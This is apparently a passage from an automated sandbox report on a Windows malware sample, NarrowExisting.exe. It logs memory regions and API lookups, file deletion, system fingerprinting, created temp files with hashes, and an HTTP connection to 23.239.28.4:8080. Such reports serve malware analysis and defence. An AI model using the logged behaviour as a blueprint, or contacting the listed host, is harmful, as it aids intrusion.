| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0x7ac
28
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\user32.dll, process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18faec |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb34 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 |
Process #14: narrowexisting.exe
257
198
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:31, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa68 |
| Parent PID | 0xa50 (c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
6D8
0x
A78
0x
61C
0x
5C4
0x
740
0x
B18
0x
4B0
0x
554
0x
5E4
0x
7A8
0x
3B8
0x
550
0x
568
0x
630
0x
664
0x
7D8
0x
620
0x
BD8
0x
B38
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00296fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002bdfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x0033ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x00352fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00380fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0039ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00397fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00391fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a7fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| windowsshell.manifest | 0x003a0000 | 0x003a0fff | Memory Mapped File | Readable |
|
|
|
- |
| index.dat | 0x003a0000 | 0x003abfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| 5kyzze.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0046ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x004affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
- |
| rsaenh.dll | 0x004f0000 | 0x0052bfff | Memory Mapped File | Readable |
|
|
|
- |
| index.dat | 0x004f0000 | 0x004f7fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x00500000 | 0x0050bfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x00510fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00510fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x00520fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0053ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x00540fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x0064ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x00960fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000970000 | 0x00970000 | 0x01d6ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001d70000 | 0x01d70000 | 0x02162fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02170000 | 0x0243efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002440000 | 0x02440000 | 0x0253ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002540000 | 0x02540000 | 0x0263ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002640000 | 0x02640000 | 0x0273ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x028bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x027effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x027cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x0276ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x02765fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x027affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000027c0000 | 0x027c0000 | 0x027cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000027e0000 | 0x027e0000 | 0x027effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x0282ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002830000 | 0x02830000 | 0x0286ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002880000 | 0x02880000 | 0x028bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000028c0000 | 0x028c0000 | 0x029bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000029c0000 | 0x029c0000 | 0x02abffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002ac0000 | 0x02ac0000 | 0x02bbffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002bc0000 | 0x02bc0000 | 0x02cbffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002cc0000 | 0x02cc0000 | 0x02cfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002d00000 | 0x02d00000 | 0x02dfffff | Private Memory | Readable, Writable |
|
|
|
- |
| comctl32.dll | 0x73cc0000 | 0x73e5dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x74270000 | 0x742a7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wship6.dll | 0x742b0000 | 0x742b5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wshtcpip.dll | 0x742c0000 | 0x742c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winrnr.dll | 0x742d0000 | 0x742d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netprofm.dll | 0x742e0000 | 0x74339fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x74340000 | 0x7437bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pnrpnsp.dll | 0x74380000 | 0x74391fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| npmproxy.dll | 0x74600000 | 0x74607fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| napinsp.dll | 0x74670000 | 0x7467ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x74680000 | 0x74685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrtremote.dll | 0x74690000 | 0x7469dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sensapi.dll | 0x746a0000 | 0x746a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x746b0000 | 0x746bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x746c0000 | 0x74703fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x74710000 | 0x7474afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rtutils.dll | 0x74750000 | 0x7475cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x74760000 | 0x74766fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x74770000 | 0x7478bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74790000 | 0x747a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wtsapi32.dll | 0x747b0000 | 0x747bcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x747c0000 | 0x747cafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x747d0000 | 0x747e6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x767a0000 | 0x76822fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| normaliz.dll | 0x770a0000 | 0x770a2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
|
For performance reasons, the remaining 57 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\programdata\114e.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\114f.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\1150.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\programdata\114e.tmp | 0.08 KB |
MD5:
0b5111a9cc6baab51851f1702403b937
SHA1: e95885d85bd47cc19e1181b046995ccd975fd59d SHA256: 62a0536a5b9d1e3cb2af52a5630c330cd30da7398bcddf4a17af0913fc502819 |
|
|
| c:\programdata\114f.tmp | 0.11 KB |
MD5:
36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345 |
|
|
Threads
Thread 0x6d8
35
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\user32.dll, process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18faec |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb34 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\OverloadGabriola.exe |
|
1 | |
| Module | Unmap | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Mutex | Release | - |
|
1 | |
| System | Get Time | type = Ticks, time = 193862 |
|
1 |
Thread 0x61c
13
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 194876 |
|
1 | |
| System | Get Time | type = Ticks, time = 201100 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Load | module_name = mpr.dll, base_address = 0x74250000 |
|
1 | |
| Module | Load | module_name = netapi32.dll, base_address = 0x74650000 |
|
1 | |
| Module | Load | module_name = SAMCLI.DLL, base_address = 0x74240000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x747d0000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x747b0000 |
|
1 | |
| System | Get Time | type = Ticks, time = 201147 |
|
1 | |
| System | Get Time | type = Ticks, time = 201350 |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 |
Thread 0x5c4
39
44
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 195874 |
|
1 | |
| System | Get Time | type = Ticks, time = 196873 |
|
1 | |
| System | Get Time | type = Ticks, time = 197871 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 23.239.28.4, server_port = 8080 |
|
1 | |
